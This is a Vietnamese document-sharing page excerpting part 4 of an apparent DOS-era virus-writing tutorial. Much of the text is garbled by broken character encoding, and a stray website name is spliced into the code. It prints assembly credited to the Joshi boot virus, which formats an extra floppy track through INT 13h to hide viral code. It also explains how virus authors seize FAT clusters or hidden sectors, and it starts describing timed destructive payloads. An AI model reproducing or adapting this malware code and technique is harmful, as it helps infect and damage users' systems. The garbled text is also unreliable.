virus - huyền thoại hay thưc tế phần 4

Tham khảo tài liệu virus - huyền thoại hay thưc tế phần 4, công nghệ thông tin, đồ họa - thiết kế - flash phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả
Nội dung trích xuất từ tài liệu:
virus - huyền thoại hay thưc tế phần 4§o¹n m sau cña Joshi virus kh«ng ®Þnh d¹ng æ ®Üa tr−íc khi format nªn ® g©y lçi khi format®Üa lo¹i 1.2Mb. mov AX, CS sub AX, 20h mov ES, AX mov DI, 2 mov BH, 0 mov BL, ptr byte [DI-1] add DI, BX cmp DI, 80h ;§Þnh vÞ ®Ó ES:DI trá v o b¶ng tham sè jb Floppy mov ptr byte [DI-3], 0 ;offset néi dung mov ptr byte [DI-2], 2 ; -1: sè ®Üa vËt lÝ mov ptr byte [DI-1], 80h ; -2: sè sector jmp cont0 ; -3: sè track Floppy: mov ptr byte {DI-2], 1 ;NÕu ®Üa mÒm sÏ khëi t¹o sector 1 mov ptr byte [DI-1], 0 ;§Üa physic 0 mov ptr byte [DI-3], 28h ;Track 28h (®Üa 360Kb) mov AL, 4 ;Verify sector 15, nÕu gÆp lçi coi nh− kh«ng mov AL, 1 ;cã sector n y, ng−îc l¹i, ®Üa sÏ cã 50h track mov CH, 0 ;do ®ã ®Üa l 1,2Mb mov CL, 0Fh mov DH, 0 call OldDisk je cont1 mov ptr byte [DI-3], 50h ;§iÒu chØnh l¹i sè track theo lo¹i ®Üa Cont1: ;PhÇn khëi t¹o descriptor mov AL, ptr byte [DI-3] ;AL = sè track push CS pop ES mov DI, offset SectorDescriptor mov CX, 8 ;T¹o 8 sector mét track Cont2: stosp ;T¹o gi¸ trÞ inc DI inc DI inc DI ;Trá ®Õn tham sè kÕ trong b¶ng loop cont2;PhÇn format ®Üa mov AX, CS sub AX, 20h mov ES, AX mov DI, 2 mov bh, 040www.updatesofts.com mov BL, ptr byte [DI-1] add DI, BX push CX mov AH, 5 ;Format mov AL, 1 mov ch, ptr byte [DI-3] ;Track thªm mov CL, 1 mov DH, 0 ;Head 0 push CS pop ES mov BX, offset SectorDescriptor call OldDisk ....... OldDisk proc near pushf ;H m n y gäi xa ®Õn ®Þa chØ cò call far int13 ;cña ng¾t 13 ret OldDisk endp SectorDescriptor db 28h,00h,01h,02h 28h,00h,02h,02h 28h,00h,03h,02h 28h,00h,04h,02h 28h,00h,05h,02h 28h,00h,06h,02h 28h,00h,07h,02h 28h,00h,08h,02h(TrÝch Joshi virus)Ph−¬ng ph¸p n y Ýt ®−îc c¸c hacker −a chuéng v dïng v× tÝnh t−¬ng thÝch kh«ng cao gi÷a c¸clo¹i æ ®Üa. Ph−¬ng ph¸p chiÕm cluster vÉn ®−îc nhiÒu ng−êi dïng dï ®é phøc t¹p cña nã caoh¬n. ë ®©y, t«i sÏ kh«ng ®i s©u v o chi tiÕt c¸ch ph©n tÝch v ®Þnh vÞ cluster trªn FAT v× sÏmÊt qu¸ nhiÒu th× giê m l m cho ®éc gi¶ thªm khã hiÓu. Tuy nhiªn, vÉn nªu ra ®©y c¸c khãkh¨n gÆp ph¶i khi sö dông ph−¬ng ph¸p n y. + Nªn ph©n tÝch FAT chØ cho ®Üa mÒm hay cho c¶ hai lo¹i ®Üa mÒm lÉn ®Üa cøng? Th«ngth−êng, c¸c hacker chän ph−¬ng ¸n chØ ph©n tÝch trªn FAT cña ®Üa mÒm v× tÊt c¶ c¸c lo¹i ®ÜamÒm (v c¶ ®Üa cøng d−íi 12Mb) ®Óu dïng lo¹i FAT 12 bit, ®¬n gi¶n h¬n l ph¶i ph©n tÝchthªm FAT 16 bit. MÆt kh¸c, c¸c ®Üa cøng dï cã chia partition hay kh«ng còng th−êng cã c¸csector Èn (Hidden sector) kh«ng dïng ®Õn (nÕu nã ch−a bÞ mét virus kh¸c tr−ng dông), rÊtthuËn lîi cho viÖc cÊt dÊu. Nh−ng vÉn cã ngo¹i lÖ khi Pingpong virus vÉn l m ®iÒu khã kh¨nn y, nã chiÕm c¸c cluster trªn c¶ hai lo¹i FAT víi ®o¹n m ph©n tÝch FAT ‘tèi −u’ vÒ kÝchth−íc còng nh− gi¶i thuËt, ®−îc ‘trÝch ®o¹n’ tõ m ph©n tÝch FAT trong file hÖ thèng IO.SYScña DOS. + Chän ph−¬ng ph¸p n y, hacker ph¶i chÊp nhËn t¶i FAT v o vïng nhí ®Ó ph©n tÝch.Nh−ng kÝch th−íc FAT cña mçi ®Üa l kh¸c nhau, cã thÓ chiÕm nhiÒu sector (®èi víi ®Üa1.2Mb lªn ®Õn 7 sector cho mét FAT). Do ®ã, kÝch th−íc vïng nhí m virus ph¶i chiÕm chçcho FAT còng ® qu¸ lín, ch−a kÓ ®Õn ®o¹n ch−¬ng tr×nh cña virus. Gi¶i quyÕt vÊn ®Ò n ycòng kh«ng ph¶i l dÔ d ng nÕu ta biÕt DOS còng ph¶i ®Õn version 3.xx míi gi¶i quyÕt ®−îc. 414/ KÜ thuËt ph¸ ho¹i: Kh«ng ai xa l¹ g× vÒ kiÓu ph¸ ho¹i cña virus (®«i khi còng ®æ lçi chovirus ®Ó che dÊu sù thiÕu hiÓu biÕt cña m×nh). Cã thÓ chia nh÷ng lo¹i ph¸ ho¹i th nh hai nhãmchÝnh.a. §Þnh thêi: §èi víi lo¹i ®Þnh thêi, virus sÏ kiÓm tra mét gi¸ trÞ (cã thÓ l ng y giê, sè lÇnl©y, sè giê m ...